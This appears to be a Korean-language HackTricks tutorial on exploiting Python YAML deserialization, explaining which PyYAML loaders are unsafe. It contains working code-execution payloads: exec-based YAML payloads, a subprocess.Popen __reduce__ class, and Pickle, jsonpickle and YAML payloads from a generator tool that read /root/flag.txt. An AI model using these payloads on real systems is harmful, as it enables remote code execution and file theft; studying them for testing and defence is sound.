Python Yaml Deserialization

Tip

AWS ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°:HackTricks Training AWS Red Team Expert (ARTE)
GCP ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training GCP Red Team Expert (GRTE) Azure ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks μ§€μ›ν•˜κΈ°

Yaml Deserialization

Yaml 파이썬 λΌμ΄λΈŒλŸ¬λ¦¬λŠ” μ›μ‹œ λ°μ΄ν„°λΏλ§Œ μ•„λ‹ˆλΌ 파이썬 객체λ₯Ό 직렬화할 수 μžˆμŠ΅λ‹ˆλ‹€:

print(yaml.dump(str("lol")))
lol
...

print(yaml.dump(tuple("lol")))
!!python/tuple
- l
- o
- l

print(yaml.dump(range(1,10)))
!!python/object/apply:builtins.range
- 1
- 10
- 1

νŠœν”Œμ€ μ›μ‹œ 데이터 μœ ν˜•μ΄ μ•„λ‹ˆλ―€λ‘œ μ§λ ¬ν™”λ˜μ—ˆμŠ΅λ‹ˆλ‹€. range도 λ§ˆμ°¬κ°€μ§€μž…λ‹ˆλ‹€(λ‚΄μž₯ ν•¨μˆ˜μ—μ„œ κ°€μ Έμ˜΄).

safe_load() λ˜λŠ” **safe_load_all()**λŠ” SafeLoaderλ₯Ό μ‚¬μš©ν•˜λ©° 클래슀 객체 역직렬화λ₯Ό μ§€μ›ν•˜μ§€ μ•ŠμŠ΅λ‹ˆλ‹€. 클래슀 객체 역직렬화 예:

import yaml
from yaml import UnsafeLoader, FullLoader, Loader
data = b'!!python/object/apply:builtins.range [1, 10, 1]'

print(yaml.load(data, Loader=UnsafeLoader)) #range(1, 10)
print(yaml.load(data, Loader=Loader)) #range(1, 10)
print(yaml.load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.load_all(data, Loader=Loader)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.load_all(data, Loader=UnsafeLoader)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.load_all(data, Loader=FullLoader)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.unsafe_load(data)) #range(1, 10)
print(yaml.full_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.unsafe_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>

#The other ways to load data will through an error as they won't even attempt to
#deserialize the python object

이전 μ½”λ“œλŠ” μ§λ ¬ν™”λœ 파이썬 클래슀λ₯Ό λ‘œλ“œν•˜κΈ° μœ„ν•΄ unsafe_loadλ₯Ό μ‚¬μš©ν–ˆμŠ΅λ‹ˆλ‹€. μ΄λŠ” 버전 >= 5.1μ—μ„œ load()에 Loaderκ°€ μ§€μ •λ˜μ§€ μ•Šκ±°λ‚˜ Loader=SafeLoader둜 μ„€μ •λœ 경우 μ§λ ¬ν™”λœ 파이썬 ν΄λž˜μŠ€λ‚˜ 클래슀 속성을 μ—­μ§λ ¬ν™”ν•˜λŠ” 것을 ν—ˆμš©ν•˜μ§€ μ•ŠκΈ° λ•Œλ¬Έμž…λ‹ˆλ‹€.

κΈ°λ³Έ μ΅μŠ€ν”Œλ‘œμž‡

μŠ¬λ¦½μ„ μ‹€ν–‰ν•˜λŠ” 방법에 λŒ€ν•œ 예:

import yaml
from yaml import UnsafeLoader, FullLoader, Loader
data = b'!!python/object/apply:time.sleep [2]'
print(yaml.load(data, Loader=UnsafeLoader)) #Executed
print(yaml.load(data, Loader=Loader)) #Executed
print(yaml.load_all(data))
print(yaml.load_all(data, Loader=Loader))
print(yaml.load_all(data, Loader=UnsafeLoader))
print(yaml.load_all(data, Loader=FullLoader))
print(yaml.unsafe_load(data)) #Executed
print(yaml.full_load_all(data))
print(yaml.unsafe_load_all(data))

μ·¨μ•½ν•œ .load(β€œ<content>”) λ‘œλ” 없이

κ΅¬λ²„μ „μ˜ pyyaml은 무언가λ₯Ό λ‘œλ“œν•  λ•Œ λ‘œλ”λ₯Ό μ§€μ •ν•˜μ§€ μ•ŠμœΌλ©΄ 역직렬화 곡격에 μ·¨μ•½ν–ˆμŠ΅λ‹ˆλ‹€: yaml.load(data)

취약점 μ„€λͺ…은 μ—¬κΈ°μ—μ„œ 찾을 수 μžˆμŠ΅λ‹ˆλ‹€. ν•΄λ‹Ή νŽ˜μ΄μ§€μ—μ„œ μ œμ•ˆλœ μ΅μŠ€ν”Œλ‘œμž‡μ€:

!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
state:
update: !!python/name:exec

λ˜λŠ” @ishaackκ°€ μ œκ³΅ν•œ 이 ν•œ 쀄을 μ‚¬μš©ν•  μˆ˜λ„ μžˆμŠ΅λ‹ˆλ‹€:

!!python/object/new:str {
state:
!!python/tuple [
'print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))',
!!python/object/new:Warning { state: { update: !!python/name:exec  } },
],
}

졜근 λ²„μ „μ—μ„œλŠ” Loader 없이 **.load()**λ₯Ό 더 이상 ν˜ΈμΆœν•  수 μ—†μœΌλ©°, **FullLoader**λŠ” 더 이상 이 곡격에 μ·¨μ•½ν•˜μ§€ μ•ŠμŠ΅λ‹ˆλ‹€.

RCE

μ‚¬μš©μž μ •μ˜ νŽ˜μ΄λ‘œλ“œλŠ” PyYAML λ˜λŠ” ruamel.yamlκ³Ό 같은 Python YAML λͺ¨λ“ˆμ„ μ‚¬μš©ν•˜μ—¬ 생성할 수 μžˆμŠ΅λ‹ˆλ‹€. μ΄λŸ¬ν•œ νŽ˜μ΄λ‘œλ“œλŠ” μ μ ˆν•œ μ •ν™” 없이 μ‹ λ’°ν•  수 μ—†λŠ” μž…λ ₯을 μ—­μ§λ ¬ν™”ν•˜λŠ” μ‹œμŠ€ν…œμ˜ 취약점을 μ•…μš©ν•  수 μžˆμŠ΅λ‹ˆλ‹€.

import yaml
from yaml import UnsafeLoader, FullLoader, Loader
import subprocess

class Payload(object):
def __reduce__(self):
return (subprocess.Popen,('ls',))

deserialized_data = yaml.dump(Payload()) # serializing data
print(deserialized_data)

#!!python/object/apply:subprocess.Popen
#- ls

print(yaml.load(deserialized_data, Loader=UnsafeLoader))
print(yaml.load(deserialized_data, Loader=Loader))
print(yaml.unsafe_load(deserialized_data))

Payload 생성 도ꡬ

도ꡬ https://github.com/j0lt-github/python-deserialization-attack-payload-generatorλŠ” Pickle, PyYAML, jsonpickle 및 ruamel.yaml을 μ•…μš©ν•˜κΈ° μœ„ν•œ 파이썬 역직렬화 νŽ˜μ΄λ‘œλ“œλ₯Ό μƒμ„±ν•˜λŠ” 데 μ‚¬μš©ν•  수 μžˆμŠ΅λ‹ˆλ‹€.

python3 peas.py
Enter RCE command :cat /root/flag.txt
Enter operating system of target [linux/windows] . Default is linux :linux
Want to base64 encode payload ? [N/y] :
Enter File location and name to save :/tmp/example
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :All
Done Saving file !!!!

cat /tmp/example_jspick
{"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["cat", "/root/flag.txt"]}]}]}

cat /tmp/example_pick | base64 -w0
gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg==

cat /tmp/example_yaml
!!python/object/apply:subprocess.Popen
- !!python/tuple
- cat
- /root/flag.txt

References

Tip

AWS ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°:HackTricks Training AWS Red Team Expert (ARTE)
GCP ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training GCP Red Team Expert (GRTE) Azure ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks μ§€μ›ν•˜κΈ°